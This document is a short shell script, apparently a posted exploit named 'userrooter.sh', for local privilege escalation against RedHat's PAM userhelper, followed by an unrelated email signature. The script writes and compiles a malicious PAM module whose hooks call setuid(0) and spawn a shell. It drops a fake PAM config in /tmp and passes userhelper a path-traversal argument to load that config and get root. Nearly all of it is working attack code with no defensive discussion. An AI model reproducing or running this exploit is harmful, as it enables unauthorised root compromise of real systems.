#!/bin/sh
# userrooter.sh by S <[EMAIL PROTECTED]>
# RedHat PAM/userhelper(8) exploit
# Hi to inNUENdo!
LAME=`rpm -qf /usr/sbin/userhelper | awk -F'-' '{print $2}' | awk -F'.' '{print $2}'`
if [ $LAME -gt 15 ]
then echo "Machine doesn't appear to be vulnerable :-\\"
echo "Trying anyway..."
fi
cat << EOF >/tmp/hello-root.c
#include<unistd.h>
#include<stdlib.h>
void pam_sm_authenticate(void){
setuid(0);
puts("userrooter by S");
system("/bin/sh");
exit(EXIT_SUCCESS);
}
void pam_sm_setcred(void){
setuid(0);
puts("userrooter by S");
system("/bin/sh");
exit(EXIT_SUCCESS);
}
EOF
cat << EOF >/tmp/login
#%PAM-1.0
auth required /tmp/pamper.so
EOF
gcc -shared -fPIC -O2 -o /tmp/pamper.so /tmp/hello-root.c
rm /tmp/hello-root.c
chmod 0700 /tmp/login
/usr/sbin/userhelper -w ../../../tmp/login
rm /tmp/pamper.so
rm /tmp/login
--
/* Derek Callaway <[EMAIL PROTECTED]> char *sites[]={"http://www.geekwise.com",
Programmer; CE Net, Inc. "http://www.freezersearch.com/index.cfm?aff=dhc",
(302) 854-5440 Ext. 206 "http://www.homeworkhelp.org",0}; */
